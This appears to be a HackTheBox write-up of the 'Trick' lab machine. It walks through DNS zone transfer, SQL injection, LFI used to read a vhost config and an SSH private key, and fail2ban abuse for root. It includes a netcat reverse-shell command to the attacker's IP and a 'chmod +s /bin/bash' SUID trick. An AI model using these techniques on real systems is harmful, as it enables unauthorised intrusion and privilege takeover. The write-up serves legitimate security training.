HackTheBox — Trick

ARZ101
6 min readOct 29, 2022

Trick an easy linux machine involved performing DNS zone transfer which lead to a management system vulnerable to sqli allowing us to login, through sqli, exploiting LFI to read vhost file to get another subdomain which was also had LFI but the site was running as the user michael and with that accessing the private key and getting a shell, this user can run fail2ban by restarting it so modifying a fail2ban action by including a reverse shell or any command which will be executed as root.

NMAP

Nmap scan report for 10.129.85.201
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the web page we see a bootstrap template which has nothing interesting

Fuzzing for files and directories it didn’t found anything as well

PORT 53 (DNS)

Having dns service running we can try to see if we can query dns records or perform dns zone transfer for that we need a domain name, we can get the domain by performing a reverse dns lookup which resolve IP to domain name

https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

dig -x 10.10.11.166 @10.10.11.166

Having the trick.htb we can add this in hosts file

Now to enumerate further we can perform the dns zone transfer

This shows root.trick.htb subdomain but it doesn't take us anywhere, on performing zone transfer with axfr

We get another domain name preprod-payroll.trick.htb, so let's add this in hosts file as well

Visiting this subdomain, we’ll get a login page on which we can try default credentials

Which didn’t worked, so next I tried sqli

That worked, so I tried running sqlmap but time-based blind so it's gonna take a lot of time in dumping the data

Foothold

Going back to the site we can see a GET parameter page fetching for pages, I tried to perform LFI on that parameter but it didn't worked

I tried running wfuzz against the parameter using LFI wordlist

Which didn’t worked but the web app had sql injection in ton of places, on viewing employee details intercepting the request, we’ll get a GET parameter id which also is vulnerable to sqli

It shows that it’s boolean-blind as on the login page it was a time based sqli so with this we can perform LFI to read nginx vhost configuration file

This shows another subdomain preprod-marketing.trick.htb

Alternatively we can enumerate this subdomain by running wfuzz

This loads up another site, having nothing special other than the same GET parameter, so I tried running LFI wordlist here as well

This started to give us some output on, filtering the response we see some changes in the response and got LFI

We have the username michael , we can try to see if we can access his .ssh folder for id_rsa

Privilege Escalation

Running sudo -l to check if we can run with sudo privileges

We can restart the fail2ban service but we don't know exactly what we need to edit, being in security group we can check what permissions this group has

We have write access to this folder which has configuration files for fail2ban

I found an article explaining how we can abuse fail2ban config file

For this we need to edit the actionban command in iptables-multiport.conf, so first let's copy this file in /tmp or other directory where we can edit it with a reverse shell

/usr/bin/nc 10.10.14.39 2222 -e /bin/bash

After editing the config file, move it back to the action.d folder and restart fail2ban service

Then start doing fail attempts on login, you’ll get a reverse shell on your port

But our reverse shell connection dies and the reason behind this is the ban duration lasts for 10 seconds and bans the host after the 5th attempt

Instead of getting a reverse shell we can just make bash a SUID with chmod +s /bin/bash

Performing the invalid login attempts on ssh will trigger the fail2ban on the 5th invalid attempt

References

--

--